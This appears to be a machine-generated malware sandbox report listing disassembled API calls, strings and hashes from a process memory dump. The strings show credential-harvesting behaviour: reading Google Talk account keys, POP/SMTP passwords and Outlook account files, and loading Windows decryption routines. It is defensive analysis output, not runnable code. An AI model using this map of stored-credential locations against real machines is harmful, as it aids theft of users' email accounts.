                                                                                                                                                                                                                      • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                                                      • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                                                      • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                                                      • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                                                      • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408392
                                                                                                                                                                                                                      • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004083E3
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00408448
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 00408363
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                                                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                    • API String ID: 2959138223-1079885057
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                                                    • API String ID: 882979914-1578091866
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                                                      • Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410780
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                                                      • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                    • API String ID: 889583718-2036018995
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 004105EA
                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004105FB
                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0041060B
                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 00410616
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041036C
                                                                                                                                                                                                                      • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
                                                                                                                                                                                                                      • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
                                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004103A7
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3143880245-0
                                                                                                                                                                                                                    • Opcode ID: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                                                    • Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                                                    • Opcode ID: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                                                    • Instruction ID: 91b6e48186620c166d1d4af44a265f78501a0d7a4e3c1a8b362a1fb29a74aa2a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17F0F9B5901300AFE7549B3CED0672676E4E75C356F04983FA30A8A2F2EB79C8448B08
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3831604043-0
                                                                                                                                                                                                                    • Opcode ID: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                                                    • Instruction ID: 120c5a36fa875b11696935209168df4f9df621bec9a22d80de65970bbd8b26ad
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13F0E9727053225FD708EB75B94184B73DDAF84324712482FF505E7282D7389C60CB59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                                                      • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00406E44
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                    • String ID: Arial
                                                                                                                                                                                                                    • API String ID: 3853255127-493054409
                                                                                                                                                                                                                    • Opcode ID: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                                                    • Instruction ID: b68263c9f29210b4531b01fb65f498acbd183b68a5d206dac463ad1e531dcf8e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFD0C974E4020C67DA10B7A0FC07F49776C5B01705F510421B901B10E2EAA4A15886D9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                    • Instruction ID: ba634a3ae7870b83a4a63a7f1e5f980291c684f9ee159ca978f4bf55c64cb7ac
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C21F9521C82826FFB218BB44C017676FD9CBD3364B190A87E040EB243D5AC5856937E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00401E60: memset.MSVCRT ref: 00401E82
                                                                                                                                                                                                                      • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                                                      • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                                                      • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                                                      • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040CBE4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                                                    • API String ID: 520177685-3817206916
                                                                                                                                                                                                                    • Opcode ID: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                                    • Instruction ID: cdbc65eb55c3596dd52c6b91df7f07afa5e13005eab10b9a6f004d04cd94ae5a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE216271618111DFD35CEB39D8C1A66B3A9FF04314B15427FF41AA7282C738EC118B89
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                    • Instruction ID: 64d8077581e7bfcf5b5a7686d9ec621b59dbeaea1ec513f5aad7139115001ce4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C012D015C564139FB20A6F50C02BBB5F8D8AD7364B181B4BF150F7293D99C8D16937E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 145871493-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                                                                                                                                                                                                      • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                                                                                                                                                                                                      • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                                                                                                                                                                                                      • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4165544737-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040ABFF,00000000), ref: 00406ACA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,Function_000105DD,00000000), ref: 00410672
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindClose.KERNELBASE(?,00407C39,?,?,00000000,.8D,0044373A,*.oeaccount,.8D,?,00000104), ref: 00407D29
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A6B,?,00404981,?,?,00000000,?,00000000,?), ref: 004047D5
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047E9
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptReleaseContext), ref: 004047F5
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptCreateHash), ref: 00404801
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptGetHashParam), ref: 0040480D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptHashData), ref: 00404819
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptDestroyHash), ref: 00404825
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptDecrypt), ref: 00404831
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptDeriveKey), ref: 0040483D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptImportKey), ref: 00404849
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptDestroyKey), ref: 00404855
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                    • API String ID: 2238633743-192783356
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                      • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                      • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                                                      • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00402EBC
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00402ECF
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00402F5C
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00402F69
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402FC3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                                                    • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                                                    • API String ID: 52435246-1534328989
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00406BA4
                                                                                                                                                                                                                      • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00406BC1
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406BD2
                                                                                                                                                                                                                    • GlobalFix.KERNEL32(00000000), ref: 00406BDF
                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BF2
                                                                                                                                                                                                                    • GlobalUnWire.KERNEL32(00000000), ref: 00406C01
                                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00406C0A
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00406C12
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C1E
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00406C29
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00406C32
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2565263379-0
